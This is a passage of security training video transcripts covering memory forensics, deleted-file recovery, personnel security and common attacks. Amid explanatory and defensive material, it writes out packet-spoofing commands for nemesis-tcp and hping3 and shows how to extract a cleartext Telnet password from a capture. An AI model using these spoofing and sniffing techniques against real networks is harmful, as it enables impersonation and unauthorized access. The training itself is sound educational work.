And that tool is called Helix. [Dan clicks the icon for the Helix tool.] If I go ahead and run the Helix tool it
gives me a warning [The wizard is open.] that says the fact that you're running this tool is modifying this
system. So when you're gathering evidence, that is important to note and it must be documented. I'll accept that
by clicking the Accept button. And I'm going to click the Camera icon on the left to acquire a live image. The
Source up here is PhysicalMemory, of which there is a little over 500 MB worth. I want to send it over to a
NetCat location. So I'm gonna put in the IP address of our Kali Linux host which is listening on port 8888.
And I'll click Acquire. So it asks me if this is okay, if I want to do this, I'm going to click Yes. And now it says
it's copying to physical memory. [The command prompt window opens with the message Copying physical
memory.] Of course it's copying it over the network to our Linux host. Back here in Kali Linux, we can see in
fact that we've got a connection from a host called 192.168.1.242. Well, that's actually not what it's called, but
that is its IP address. So now it's just a matter of waiting until we receive the entire memory dump before we
can analyze it using a different tool called Volatility. We can now see in Linux that it received a number of
bytes. And if we type ls, we'll see the existence of our clientmemdump1.dd file. So the next thing we'll do is
use a different tool, and that's going to be Volatility, to analyze that file.
So with Volatility, I'm going to use -f for file. I'll specify the file name. And the first thing we'll start off with is
asking it to give us just a little bit of image information about that memory dump image. Depending on the
amount of memory gathered, that might take just a few seconds or it might take a few minutes. Okay, so it
looks like, next to Suggested Profile(s), it's a Windows XP machine. And further down, the Number of
Processors is set to 1. And then we have image date and time stamp information listed down below. I'm going
to use the up-arrow key to bring up that Volatility command again. Except, instead of imageinfo as the last
parameter, this time we're going to use pslist to give us a list of running processes at the time that the memory
dump was acquired. And sometimes that can be absolutely crucial when it comes to evidence in a specific
case. So we have a list of the processes here, and of course we see the date and time stamps over on the far
right. Let's clear the screen and bring up that command again. And let's change the last parameter from pslist in
this case to connscan to show any active connections, again, at the time that the memory dump was acquired.
Here we can see we have numerous connections to something on port 80, [A list of connections is
displayed.] we can see IP addresses. Now of course, there are ways that we can conduct reverse lookups.
For instance, using nslookup, which I can do here in Linux. I can set type=ptr to do a reverse portal lookup,
and maybe I'll pop in the first IP address I see here. [He enters the IP address 23.34.200.121.] And then I get
answers back that are listed from that. I get a non-authoritative answer, which means it came from a different
DNS server. You can see that we've issued the volatility command against our dump file again. But we've used
as a last parameter clipboard to show us the contents of what was copied in memory. [A table with column
headers such as Session, WindowStation Format, Handle, Object, and Data is displayed.] And notice that
under the Data column on the right it looks like we've got some kind of variation of my dog has fleas, which
appears to be some kind of a password. So we can start gathering some very detailed information from what
was happening within a memory dump at the time that it was acquired. In this video, we learned how to create
a physical memory dump.
[Topic title: Viewing Deleted Files on a Hard Disk. The presenter is Dan Lachance.] In this video I'll
demonstrate how to view deleted files on a hard disk. [The Restoration folder is open in the Windows File
Explorer. It displays files such as DLL16.DLL, DLL32.DLL, file_id.diz, FreePC.rtf, and
Restoration.exe.] Most of us know that when we delete a file it actually just goes into the Recycle Bin, at least
on the Windows platform. And, of course, if we empty the Recycle Bin, the file appears to be gone forever. Of
course, that's not the case. Files are always retrievable even if you repartition a disk, let alone format the file
system on that partition. And that's why it's important that we use the appropriate disk scrubbing or cleansing
tools to wipe the content from the disk appropriately. And depending on the industry we're in, there might only
approved tools that we're allowed to use to do that. Here I've downloaded and have available a free file
restoration tools for the Windows platform. So I'm going to go ahead and open up this Restoration
program. [The Restoration Version 3.2.13 window opens. It is divided into two sections. The first section
displays many column headers such as name, In Folder, Size, and Modified. The second section displays the
Drives drop-down list box, buttons named Search Deleted Files, Restore by Copying, and Exit. The All or part
of the file textbox is also displayed.] And I'm going to leave it on drive C, and I'll click the Search Deleted
Files. And immediately we can see the number of files that it's found that were removed from the hard disk on
this system. So we can see the name of the file, the folder it was in, the size and the modification date and
timestamp, although the modification column is cut off a little bit currently in the display. But we can widen
that after the fact.
Now we have the choice of selecting either a single file. [The presenter selects a few files by using the Control
and Shift option.] Let's just verify that we can see the modified column. Or we could use Ctrl-click to select
non-adjacent multiple files or even Shift-click for adjacent files. The idea is that we select these files because
we then have the option of clicking the Restore by Copying button at the bottom right. [The Save As dialog
box opens.] And we can determine exactly where it is that we want to restore those entries. Now at the same
time we should also bear in mind there are other tools that we might use to look at deleted files. Here I've got
the EnCase Enterprise tool [He switches to the EnCase Enterprise Edition window. The window includes a
menu bar below which are several buttons for New, Open, Save, and Print. Below the buttons, the window is
divided into three sections. The first section includes nodes such as Cases and subnodes named Case 1 and C.
The second section displays many files in a tabular format. Some of the column headers are name, Filter, In
Report, File Ext, and File Type. The third section is below the first two sections. ] where I've already created a
case file and acquired the contents of drive C, as you can see clearly here. So of course, we can peruse drive C
and see what's there at the point of time that this evidence was acquired. But it's always important to think
about making sure [He right-clicks the C subnode.] that there's no tampering with evidence. Of course, that
means following the chain of custody. One aspect of that is to create a hash. So here in EnCase, I could right-
click on drive C and choose to generate a hash [He selects Hash from the shortcut menu and the Hash window
opens.] for all sectors on this partition, or I could specify a subset. Of course, at the Windows command
line, [He switches to the Windows PowerShell window.] for instance, in PowerShell, we can use the get-
filehash cmdlet, [He refers to cmdlet get-filehash and the hash
EDABA50089717400A673F3972DA4D379702FDO8A8FA7123749745E6C9BE3C2D6.] given a file name to
result in a hash. Now the idea is that when we generate a hash in the future and compare it to this hash, if
anything's changed, the hash will be different and so we'll know that something has changed. [He switches to
the EnCase Enterprise Edition window.] And the same thing is true here in the EnCase tool. [He switches to
the Disk Scrubber v3.4 window.] There are plenty of tools available for scrubbing or wiping disks. [The Disk
Scrubber v3.4 window includes the Drive to Scrub drop-down list box which displays the options available.
The window also includes the Priority drop-down list box and adjacent to it is the Scrub Drive button. Radio
buttons for the options Normal (Random Pattern Only), Heavy (3-Stage Pattern, 0s+Rnd), Super (5-Stage,
0s+1s+Chk1+Chk0+Rnd), and Ultra ((-Stage, DoD recomended spec w/Vfy) are displayed.] Here I'm looking
at the Disk Scrubber tool where we can choose the disk that we want to sanitize, essentially. We can scrub it
and we can also determine exactly how that's going to happen where we can have multistage overwrites of
randomized data. Now this way, if a disk is wiped in a thorough manner, it makes it much more difficult for
anyone to acquire any data remnants in the future. In this video we discussed how to view deleted files on a
hard disk.
Table of Contents
[Topic: Hiring and Background Checks. The presenter is Dan Lachance.] Taking the time up front to be very
careful about which employees get hired in a company can pay dividends over the long term. In this video,
we'll talk about Hiring and Background Checks. The first core item that we must consider is, how qualified an
individual is for a given job role. Do they have the correct skill sets? Are they suitable in terms of their
personality for what's expected of them and are they trustworthy? Job descriptions then, must be detailed and
well-written to attract the appropriate candidates. Also, certain positions might have access to classified data or
sensitive information. And as such, it might be especially important to conduct a thorough background check
for this type of position. Competencies for potential employees might require that teamwork, leadership, and a
proper proven background of ethics be used within the job role. There are also different types of reference
checks for potential employees like personal references that might be able to attest to the character of the
individual. Work references of course, lead a lot of insight into the past work history of an individual. A
thorough background check could uncover additional information not disclosed by the potential employee. We
can use this thorough background check result and information perhaps to make a decision about hiring,
because it might be related to minimizing future lawsuits. Or to even actually identify falsifications perpetrated
by the potential employee, related to things like their work history, their job roles and duties in the past, their
reasons for leaving jobs. Or it might also bring to light criminal past history.
The benefits of thorough background checks, even though it might cost more and take more time up front, are
overall a reduced hiring cost. Protection against potential lawsuits, lower employee turnover, and the
identifying of criminal activity. So over the long term, what we're doing is being very selective of who gets
hired to ensure the best possible candidate is filling a job role. Other things that might be done with
background checks and employee hiring include polygraph tests, or drug tests, or even personality testing.
There's also the timing that we must think about in terms of the full support that would be required or items
that should be done prior to hiring, such as completing a background check for criminal activity. And also even
when people are hired, it's important that in terms of timing that we periodically re-investigate some of these
aspects. This might include periodic drug testing of employees. Then there's also the financial side of things,
such as conducting a credit check by looking at the credit history of either potential new employees or even
existing employees. The reason this can be important is because people in desperate financial situations will
sometimes resort to desperate attempts to get money, perhaps to pay off lenders. And so over time we might be
able to shed light on this actually happening in the organization where people that have access to customer
credit card numbers might actually be using them fraudulently. Driving records might also be very important,
certainly if the job position involves driving for a company business. You might also want to validate social
security numbers to make sure that they actually exist. You might also want to have a cross reference check
against a terror watch list for potential employees. In this video, we discussed Hiring and Background Checks.
[Topic: User Onboarding and Offboarding. The presenter is Dan Lachance.] Most organizations have a
specific hiring and termination set of procedures for users. And in this video, we'll take a look at user
onboarding and offboarding. With user onboarding, there's often an employment agreement and acceptable use
policies that the user must sign off on, prior to starting employment. These documents often include company
rules and restrictions, and will include various security policies and acceptable use policies, for example, email
and VPN acceptable use. It will certainly include a job description of what is expected of the user. And any
violation consequences that might be taken into consideration when any rules are broken. Of course, the
employment agreement will also detail whether it's a term or a permanent position, or detail things like the
length of employment. In some cases, a non-disclosure agreement, or NDA, must be signed by the new
employee, to protect confidential information. Such as trade secrets, proprietary company information, or, if
the user is dealing with legal contracts, they'll often have to sign an NDA related to that. So essentially an
NDA, or non-disclosure agreement, is an agreement to not disclose sensitive information. Violations could
result in strict penalties, including being terminated. User onboarding often includes the creation of a new user
account and group membership, to give access to specific resources. It might also include the issuance of
various access cards to access a parkade, or a building, or even a certain floor in a building.
User training is often conducted so that users are aware of how procedures are run within the organization, and
also should include security training. With user offboarding, often many companies will conduct an exit
interview, to determine what the user thought of their experience and what might need to be improved. User
offboarding also means environment security, which includes things about physical aspects of what the user
was doing in the company, such as their workspace and any equipment that they physically had access to. User
offboarding must also stipulate what would be done with disgruntled employees that need to be removed from
the premises. Often, this means they need to be escorted by security personnel. Employee temperament also
plays a part in user offboarding, where some disgruntled employees might become belligerent or violent. So
terminations, then, need to be planned ahead of time within the organization. There should be a specific
defined procedure that is known by HR and other related individuals.
This could also be something that's done in a private environment, such as within a single organization, or even
within a department within the organization. So documents need to be prepared to document how termination
should occur. And the idea is to reduce any negative incidents, including data leakage, when users are
offboarded. Employee equipment includes things like mobile devices, such as smartphones and tablets,
laptops, vehicles, and so on. So it's important that this equipment be returned and properly sanitized if needed.
There's also the computer account of a user, any email or VPN accounts that they were given access to, that
would either have to be suspended or disabled, or removed according to company policy. HR, of course, must
take into account the final paycheck that is owed to the employee. Security must be notified in terms of IT
security, and also physical security personnel, that a user is leaving the company. Often a witness is required
when a user is being terminated, that could be a manager or a security official within the organization. It's also
important to obtain any ID or badges or keys that were issued to the employee upon hiring. Once terminated,
the user might be escorted off premises and told that they're not allowed to return. In this video, we discussed
user onboarding and offboarding.
[Topic: Personnel Management Best Practices. The presenter is Dan Lachance.] In this video we'll talk about
Personnel Management Best Practices. For users within the organization there needs to be ongoing
supervision. There should be periodic performance reviews that we can compensate well performing users with
or recognize them for their contributions to the organization. Performance reviews can also be used to develop
skill sets for employees in terms of future ambitions for acquiring certain certifications or other job roles
within the company. The performance review can also define the training requirements in order for a user to
reach those goals. Performance reviews can also shed light on the overall morale of users within the company.
Job rotation is used to reduce the risk of collusion by placing people in different jobs on a periodic basis. Any
fraudulent or unauthorized activity could come to light when a new user takes on a job role handled by another
user previously. Separation of duties ensures that one employee isn't solely responsible for all of the parts of a
business process, from beginning to end. Succession planning is also important to ensure that we always have
additional candidates that are suitable for a job role for a user that might leave the organization, or might, for
example, retire within a period of time.
Dual control requires at least two people to be involved with a specific business process. The idea here is that
we reduce the possibility of fraudulent activity. Although we aren't eliminating the possibility of collusion
between those two or more persons. Cross training allows us to make sure that all of our eggs aren't in one
basket. So that we're not dependent upon a single employee to perform a special job role, especially if it's
crucial to business operations. The principle of least privilege states that we should grant only the required
permissions for a user to perform a job role and nothing more. Periodically, we can check that this is being
adhered to through various audits. Mandatory vacations not only ensure that employees are freshened and are
well relaxed and ready to come back to work and be productive. But they also allow the identification of
abnormalities in their job roles while someone else fills in for them while they are on vacation. In this video,
we discussed Personnel Management Best Practices.
[Topic: Threats, Vulnerabilities, and Exploits. The presenter is Dan Lachance.] In this video we'll talk about
Threats, Vulnerabilities and Exploits. The first thing to say is that the terms are often confused. So the
distinction between Threats, Vulnerabilities and Exploits is very important for a number of reasons. Such as
when we take a look at documentation that refers to these terms, or in the crafting or use of organizational
security policies. It's important to understand that when we talk about security the weakest link in a chain
essentially defines your security posture, so it's important that we identify those weak links and do something
about them. With a threat we need to have an inventory of assets that need to be protected against those threats.
So an asset inventory then allows us to perform a threat analysis against those assets. We can then determine
what kind of negative impact against an asset might be realized. So essentially this is an impact analysis.
Assets and threats need to be prioritized so that way, energy and resources can be allocated accordingly. A
vulnerability is a weakness. It could apply at the hardware level where we're running out of date firmware for
instance on a wireless router that has known vulnerabilities or it could be the lack of physical security controls.
Maybe servers are behind a locked door. At the software level, a vulnerability could be exposed until software
updates are applied. Often software updates address this type of issue. But sometimes a software
misconfiguration can present a vulnerability that can be exploited by a malicious user. Some cases, even
sticking with the default settings in some software, can mean that we've got vulnerabilities.
An exploit takes advantage of a vulnerability or weakness. Now this can be done legitimately when we
conduct penetration testing to identify these vulnerabilities that actually can be exploited because then we can
mitigate them in some way. But at the same time malicious users might exploit a known vulnerability if we
haven't put a security control in place to mitigate that vulnerability. Zero-day exploits are those that are not
known by vendors or the general IT security community. However it is known by one or more malicious users
and they can take advantage of them. In some cases zero-day exploits might be indirectly detected with some
kind of intrusion detection or prevention system. Because it's really looking for suspicious activity out of the
norm, which could indicate a zero-day attack of some kind. An example of a threat would be the loss of data
availability. Now that could be for numerous reasons because a server has crashed or because files have been
locked due to ransomware. A vulnerability might be the lack of user awareness in training that might lead to
something like ransomware where the user opens up an email and opens up a file attachment that they didn't
ask for or weren't expecting. The exploit of course would trick the user somehow into opening something like
a file attachment that would spawn ransomware. In this video, we discussed threats, vulnerabilities, and
exploits.
[Topic: Spoofing. The presenter is Dan Lachance.] Forgery has been around for a long time. Whether it's in
the form of a forged signature, a fake passport, or even counterfeit money. In this video, let's talk about
spoofing. Spoofing is forgery, and in the digital IT world, there are many different types of spoofing attacks to
fake an identity. This includes MAC address spoofing, which might be used by malicious users so that they
can make a connection to a wireless access point that uses MAC address filtering. IP address spoofing might
be used to defeat basic packet filtering rules that are simply based on a source network range or IP address.
DNS spoofing is often called DNS cache poisoning. Essentially, an attacker can compromise either the
localhost's file on a device or a DNS server, so that when a user attempts to connect to a friendly name, they're
instead redirected, unknowingly, to a fraudulent, for example, website that looks like legitimate website. Email
spoofing is an email message that appears to come from a valid email address, where the email address was
actually completely faked.
And this is possible in some mail systems. Man-in-the-middle attacks are used to interrupt communication
between two parties by forging the identity of one of the parties and knocking that party offline. Now this
would be unknown to the other end of the communication. Session hijacking has many different attack types,
including IP spoofing. Now, with a man-in-the-middle attack, we are essentially interrupting the
communication between two parties. There are many ways that this can be perpetrated, including through SSO,
or simply through IP spoofing. SYN scanning can also be used with attack types with spoofing. With SYN
scanning, the malicious user attempts to set up an IP connection with a host at different port numbers. Now,
this is done by sending a synchronization or SYN packet. And often, this is done to attempt to fake the
initiation of a three way handshake to different services running on a server.
There are many freely available tools that can be use to spoof packets. So, for example, pictured on the screen
we're seeing the use of the nemesis-tcp tool. [Dan explains the following line on screen: nemesis-tcp -v -S
200.1.1.1 -D 56.37.87.98 -P /fakepayload.txt] Where -v turns on verbose screen output. -S specifies the source
that we want this to appear to have come from. -D is the destination we're sending this traffic to. And -P
specifies the location of a payload file, where we could determine whatever we want to be seen in this
transmission from a simple text file. So as you can see, it's very easy to forge an entire TCP packet. Any
network intrusion detection or prevention tools, even host intrusion detection and prevention tools that might
look at packets, would probably not be able to identify that this is forged. Now unless you're using some kind
of encryption and digital signature at the packet level, it's pretty hard to determine what you're looking at on
the network has been forged or not. In this video, we discussed spoofing.
[Topic: Packet Forgery using Kali Linux. The presenter is Dan Lachance.] Spoofing means forgery. In this
video, I'll demonstrate how to forge packets or how to spoof packets using tools available in Kali Linux. [The
root@kali:~ command prompt window is open. The following command is displayed on screen: cat
fakepayload.txt. The output is as follows: This is fake data used in a spoofed packet.] There are plenty of tools
out there for different platforms, including Windows, where you can create your own packets completely,
entirely, including the payload and all header fields and then send it out on the network. Whether it's a wired or
wireless network. So here in Kali Linux, I've created a file called fakepayload.txt and I've catted it here using
the cat command so we can see what's in it. It simply says this is fake data used in a spoofed packet. What
we're going to do here is we're going to use the hping3 command to forge or create a fake TCP packet. So I'm
going to type hping3, that's the command. What I want to do is send this to a target at 192.168.1.1. So I'm
going to be placing a packet or packets out in the network. That's where they're going. That's the destination.
Now I'm going to use --spoof. And I want it to look like it's coming from a host at 4.5.6.7. So I'm forging that
or really I'm spoofing that. The next thing I want to do is give it a TTL, let's say of 31. The TTL value in the IP
header field is decremented each time a packet goes through a router.
And so different operating systems start off with different TTL values like 127 or 255, 128 and so on. So this
is going to indicate then that the packet appears to not have originated on the local subnet even though it
actually has. I'm going to give it the --baseport of 44444. In other words, this is a higher level source port, for
example, from a client. And the --destport, destination port, let's say is port 80. So it looks like it's going to
port 80 and this is a transmission from a client so it's a higher level port number. And finally, I'll use -E and I'll
tell it I want to use my fakepayload.txt file. And I'll just make sure that I put in -d 150, to make sure I'm telling
it a size that can accommodate what's in my fake payload. Now, before I press Enter, I'm going to start a
Wireshark packet capturing session. Like Kali Linux, Wireshark is another free tool that you can download
and use. [The Wireshark Network Analyzer Window is open. Running along the top is a menu bar with various
menus such as File, Edit, View, and so on. Below that is a toolbar with several icons such as save, refresh, and
so on. Below that is a Filter field with the following entry: ip.dst==192.168.1.1. Next to this field is a drop-
down icon and three options, which are Expression, Clear, and Apply. The rest of the window is divided into
four sections, which are Capture, Files, Online, and Capture Help.] So here in Wireshark, I'll click the
leftmost icon [from the toolbar] to begin a packet capture. [The Wireshark: Capture Interfaces dialog box
opens. It lists various network interfaces with IP addresses. There are three buttons at the end of each line,
namely Start, Options, and Details. There are also two buttons at the bottom of the dialog box, namely Help
and Close.] I'm going to select the appropriate network interface here, where I've got traffic on my machine
and I'll click Start. [Dan clicks the start button corresponding to IP address 192.168.1.157.]
And at this point, it's capturing network traffic. [The Capturing from Microsoft - Wireshark page opens in the
window.] I've already got a filter here where the IP destination equals 192.168.1.1. Notice nothing is listed
because we haven't yet injected our fake packet. All right, [The screen switches to root@kali:~ command
prompt window.] so now that we're capturing network traffic, let's go ahead and send out our fake traffic. So
I'm going to press Enter back here. [Dan executes the hping3 command that he had previously typed.] Even
though I've got a message saying operation not supported, can't disable memory paging, it's all good. It is
continuously transmitting those forged packets. Now, if we switch over to Wireshark we're going to see just
that. Notice here in WireShark, [He switches back to the Wireshark window.] we have what appears to be
traffic coming from 4.5.6.7, destined for 192.168.1.1 and it keeps going. Let's stop the capture with the fourth
icon from the left [on the toolbar] and let's just click on one of these. [He selects one of the packets.] So, if we
were to examine the ethernet header, well, we've just got some MAC address information. And we certainly
could have spoofed the MAC address, although we didn't in our case. Here in the IP header, notice that we've
got interesting things, like the TTL, the Time to Live is actually set to a value of 31. And the source and
destination IP addresses are as per what we instructed.
And if we go a little bit deeper, you can see down here in the text portion of the payload, it says this is fake
data used in a spoofed packet. So clearly, the message here is that it's very easy to craft or create forged traffic
and put it out on a network. Now, there are many intrusion detection and prevention systems. Even if you're
just generally periodically capturing network traffic, you need to take it with a grain of salt. Just because you
see a specific piece of traffic on the network, it doesn't mean it actually is legitimate and originated from where
it appears to have originated. In this video, we learned how to forge packets using Kali Linux.
Upon completion of this video, you will be able to recognize how impersonation can be used to gain
unauthorized access.
Objectives
[Topic: Impersonation. The presenter is Dan Lachance.] In this video, I'll talk about Impersonation. One form
of impersonation is social engineering, where a malicious user might pose as someone from the help desk,
asking a user for their current password, which is required for a password reset. Now this might happen over
the telephone, or it might come through a spoofed email message. In the same way, a malicious user could
pose as a telecom provider to gain physical access to a wiring closet. Or, they could pose as a banker or a bank
that a user does banking with in order to gain access to their specific account details. And again, that could
happen over the phone or most often, through an email message with a link to a fraudulent site. At the user
level, impersonation can take the form of a user connection to a web app, in other words, a session. At the
device level, we could be using a device to establish a VPN session. And that connection possibly could be
impersonated. But in order for this type of impersonation to take place in a web application session or VPN
session, a lot of things have to go right for the attacker. This is where a man-in-the-middle attack comes in,
which is often called an MitM. This is a real time exploit where we originally have two communicating parties
that are both legitimate. However, we have an attacker in the middle. Now, both parties will assume that they
are communicating directly.
They don't know that there's someone in the middle that's capturing the conversation and perhaps even
modifying messages before they're being relayed to another party. Although, with a man-in-the-middle attack,
the messages don't necessary have to be modified but they are being caught or viewed and then relayed off to
the other party. So in some cases when that data is altered, it means that the man-in-the-middle attacker has the
ability to do things like alter the course of a banking transaction, and so on. Man-in-the-middle SSL or TLS
attacks, means that a compromised system might be configured to trust certificates from any authority. Now,
today's devices, including smartphones, have a certificate store where they have a number of trusted root
certificates. Now these trusted root certificates are used when the device connects to, for example, a VPN that
uses certificates or an HTTPS website, and they will look at the signer of the certificate, for example, to that
HTTPS website, to see if they trust the signer. Now the problem is that most of today's devices have way too
many trusted root certificates. And as a matter of fact, if any of them are compromised, so are all of their
certificates, potentially. So, when an attacker potentially compromises a system, what he or she could do, is
install a trusted root certificate authority under their control.
Now, what this means then, is that a client that would connect to a protected HTTPS web server, for instance,
would then trust that signer. And therefore, the user wouldn't get a warning that the site shouldn't be trusted.
Now, clients don't normally require a PKI certificate in this kind of example, but servers do. Another aspect to
consider with impersonation is a compromised private key. When we talk about a PKI digital security
certificate, we are also implying that there is a public and private key pair that is unique and issued to a user, a
device, or an application. Well, if the private key is compromised somehow by a malicious user, then that
malicious user can essentially act, or do things on behalf of the owner of that private key. They can digitally
sign messages. Or they could decrypt messages that were intended to only be decrypted by the owner of the
private key. One way that a private key can be compromised is by brute force guessing. So, for instance, if a
user exports their private key to a file and uses an easy to guess password. And perhaps they store that on a
USB thumb drive which is lost or stolen. It's possible that it could be compromised simply by guessing
passwords. Impersonation also deals with session hijacking, essentially taking over previously established
session. And this is part of what can happen with a man-in-the-middle attack. There are various types of
session hijacking examples related to varying protocols like HTTP and FTP. However, in some cases, the
original legitimate station that is being taken over, essentially, in the communication, may be taken offline by
the attacker. So what are some countermeasures then for man-in-the-middle attacks and session hijacking?
Some of them are common fare, such as hardening devices, using dedicated servers for network services where
we don't collocate other network services on the same host. We might also consider using network and host
firewalls, both at both levels, to control in and outbound traffic.
The use of intrusion detection and prevention systems, or IDS and IPS systems, is highly recommended to
detect suspicious activity. We should also consider trimming down the list of trusted certificate authorities on
all devices. Otherwise, we really have an increased attack surface that really isn't necessary in most cases. As
always, user awareness and training of this possible security vulnerability is always important. We should also
make sure that we don't rely solely on IP address blocking, or even MAC address blocking for that matter.
When it comes to our security counter measures, they're good as one layer. But they shouldn't be the only thing
that's required because addresses are easily spoofed with freely available tools. In this video, we talked about
Impersonation.
[Topic: Cross-site Scripting. The presenter is Dan Lachance.] There are many crafty ways that malicious
users can force the execution of malicious code on machines. In this video, we'll discuss cross-site scripting. A
cross-site scripting attack begins in step 1, with an attacker injecting some kind of script code into a trusted
web site. Now this normally happens, for instance, through a field on a web form that isn't properly validated.
In other words, it might allow the user to input anything before the data gets saved and uploaded to the server.
Now usually what the attacker is doing is they are injecting their malicious code into server side scripts. In step
2, an unsuspecting user of that same site then executes the script. In step 3, the script is now running on the
unsuspecting user's computer locally in their browser. And could potentially access their cookies in their web
browser or other session details. Most modern web browsers are sandboxed, which means that anything
running in the context of that web app will not affect outside of that web application. They can't talk to the
operating system kernel and so on. But it depends on the version of the web browser and use on the client
device and how it's configured.
Cross-site scripting is often simply referred to as XSS. So what can we do about it? Well, some
countermeasures include filtering inputs. So we want to make sure that developers are following secure coding
guidelines. And that they are carefully validating every field on a web form, or even validating URL strings
sent to a server to be parsed, to make sure that only acceptable data exists. As always, user awareness training
is also very crucial. So that if a user notices some kind of suspicious activity or behavior in their browser, they
should generally be aware that maybe something is up, there could be some kind of a cross-site scripting attack
taking place. In other cases, cross-site scripting attacks execute code on a client machine in the background
where there may not be any visual indicator, at least at the time of the attack. Another type of attack is a cross-
site request forgery, which is often referred to as a CSRF. In this type of attack, code gets executed for a user
that's already authenticated to a web service. Now that code is executed by an attacker, not by the user. The
user doesn't know about it. So one way this could happen is an attacker to compromise a user system and then
have the ability to send a user authentication token that's been modified by the attacker to the web app.
Now this can be done by the attacker making changes to, or perhaps, modifying and sending off a web browser
cookie to a web app that already trusts that there is an established session in place. So the attacker then could
transmit instructions to the server without user consent. This could also take the form of a URL that the user is
tricked into clicking on. Maybe to transfer funds to a different account at a different banking institution and so
on. There are countermeasures that we can apply here to mitigate the effect of cross-site request forgeries. First
of all, the web application, server side, can ensure that requests came from the original session. There are many
techniques that usually developers would put in place, due to security coding guidelines, to make this happen.
Now, one would be to check the origin header in the HTTP request to make sure that it's valid and matches the
site. Or to use some kind of a challenge token that's unique to each session. Or to use some kind of a
randomized hidden cookie value that gets checked every time the cookie is sent to the server. Users, of course,
should not leave authenticated sessions open. So, for example, if a user is working with their email online or
working with online banking, as soon as they're finished with it, they should log out and not wait for the time
out to occur. At the same time, users should never save passwords for web applications. In this video, we
talked about cross-site scripting.
[Topic: Root Kits. The presenter is Dan Lachance.] In this video I'll talk about root kits. A root kit is form of
malware and it can apply to the Windows platform or the Unix or Linux platform including at the smartphone
level. So it's a form of malware that is usually delivered through a Trojan Virus. A Trojan Virus appears to be
something useful or benign, like free downloadable software. However in fact, it actually is used as a vehicle
to transport malware. So a root kit then creates a backdoor. A backdoor allows an intruder to keep elevated
access to a system or an application without detection. This can be done in many ways including by replacing
operating system files that allow and hide intruder access. For example, consider a root kit that replaces the
netstat command on the Windows and Linux platforms. The netstat command is usually used by administrators
to view any connections that are made to a machine on a given port or outbound connections made to other
machines on a given port. By replacing the netstat command, an attacker can hide the fact that they've got
some kind of a listener. Or that they've got some kind of a process that periodically reaches out to receive
instructions from some control center owned by a malicious user.
Kernel root kits exploit operating system kernels and their ability to be modular and expandable. Because if we
allow access to the operating system kernel, we are allowing access to everything. And, in many cases, things
like drivers are given operating system kernel ability. So even installing a driver could be a form of malware
that could infect a system and install a root kit. Now a root kit could also replace many files. It's not as if it has
to replace a single file. So in the case of hiding listening network sockets, as per our netstat example, we have
to know what a socket is. A socket is a combination of a protocol plus a host and a port such as http:// a host
name colon and then a port number. Other kernel root kits will actually hide files that aren't seen with normal
operating system commands. These files might contain illegal data or they might contain additional malware
payloads. Now we could also have running processes that are hidden from normal operating system tools like
the Windows Task Manager or the Linux ps command. There's also the possibility of kernel root kits being
spawned due to some hidden configuration somewhere such as in the Windows registry or within a Unix or
Linux configuration or .conf file. Now bear in mind, in order for a kernel root kit to be installed in the first
place, at some level the machine has to be compromised. Countermeasures to root kits include hardening the
network as well as hosts on the network.
And of course running up-to-date antimalware that might detect a root kit. There are also specific anti-rootkit
tools available from various vendors. Examples include the Malwarebytes Anti-Rootkit, or the McAfee
RootkitRemover. The use of intrusion detection and prevention systems is also really important in this case to
detect suspicious activities such as the replacement of operating system files. In the Windows world, user
account control, or UAC, can also be beneficial in that it can prompt the user of the system before anything
happens in the background, such as making a change to the registry to spawn some kind of a root kit. Also we
might consider disabling in the Unix and Linux platforms Loadable Kernel Modules or LKM. In other words,
we want to make sure that what's required for the kernel to function properly, things like IPv6, which may be
turned on or off from the kernel, or additional drivers. We want to make sure perhaps that they are compiled
into the Linux kernel where possible. In this example, [The Malwarebytes Anti-Rootkit BETA v1.09.3.1001
wizard is open. The wizard is divided into two parts. The first part is titled Overview, and it contains four
options that are Introduction, Update, Scan System, and Cleanup. The Scan System option is selected by
default. The second part displays the contents of the option selected in the first part. This part displays a Scan
Progress section, which contains three checkboxes, namely Drivers, Sectors, and System. It also has a Scan
button. At the bottom of the wizard are two buttons, Previous and Next.] you can see the Malwarebytes Anti-
Rootkit tool that's been installed on this system. Where down below, the scan targets that it will look at include
drivers, sectors on the disk, as well as the entire system. So I'm going to leave them all checked on and I'm
going to go ahead and click the Scan button. In this video we talked about root kits.
After completing this video, you will be able to explain the concept of privilege escalation.
Objectives
[Topic: Privilege Escalation. The presenter is Dan Lachance.] In this video, I'll talk about privilege escalation.
Privilege escalation allows the unintended granting of privileges to unauthorized parties. There are many types
of attacks that can result in privilege escalation, such as social engineering, to trick someone into divulging
things like credentials. Or packet sniffing tools, which can capture network traffic to reveal vulnerable items,
such as clear text passwords. Consider the example of using WireShark to capture network traffic, which we
see the result of here on screen. [The Telnet from Windows to BSD.pcapng page is open in Wireshark
window.] I'm going to filter this packet capture for Telnet traffic. Telnet is often used to remotely administer a
device. [Dan types telnet in the Filter field.] Like a switch or a router or even an operating system. However,
the problem with Telnet is nothing is encrypted. We really should be using SSH instead. So let's filter this
packet capture for Telnet. We can see we have a number of Telnet packets here. So I'll now go to the Analyze
menu. And I'll choose Follow TCP Stream. [from the drop-down.] And immediately we can see that the
password for user student has a value of chicago. [The Follow TCP Stream window opens.] So this is one way
where we could elevate privileges for the target where this set of credentials was used.
And now we have a way to get into that device. Other attack types include buffer overflows, where data goes
beyond allocated memory, for example, for a variable for a field on a form. So often, developers can ensure
that this doesn't happen, by making sure that their code never allocates more memory than is needed to
accommodate specific data types. Also, privilege escalation might result from a compromised system, where
an attacker has installed a rootkit. Or brute-frocing credentials for a privileged account could reveal the
password. Reconnaissance also can reveal things like service accounts that don't have any passwords, that an
attacker might take advantage of. Privilege escalation begins with a malicious user learning of systems through
reconnaissance techniques. That might include a ping sweep to get a list of hosts that are up on a network, but
they have to be on the network in the first place to do that. The next thing would be that the malicious user
would learn as much as possible about the systems that are up and running.
This can be done through enumerating ports, services, user accounts, and anything else that responds, using
freely available tools. This could lead to the attacker being able to compromise an unprivileged user account,
which they could then log in with to learn more. Eventually they might be able to compromise a privileged
user account. Which would allow them to do things like installing a rootkit to ensure that they have continued
future access through a hidden mechanism. Of course, attackers will then hide traces of the compromise,
perhaps by modifying log entries. What can we do about privilege escalation type of attacks? Well, hardening
is always something that is an option. We can apply firmware and software updates to all devices. We can
make sure that we are aware of software flaws, so that we can put controls in place to mitigate them. So for
example, if we absolutely must use insecure protocols like Telnet or FTP, maybe using it through a VPN
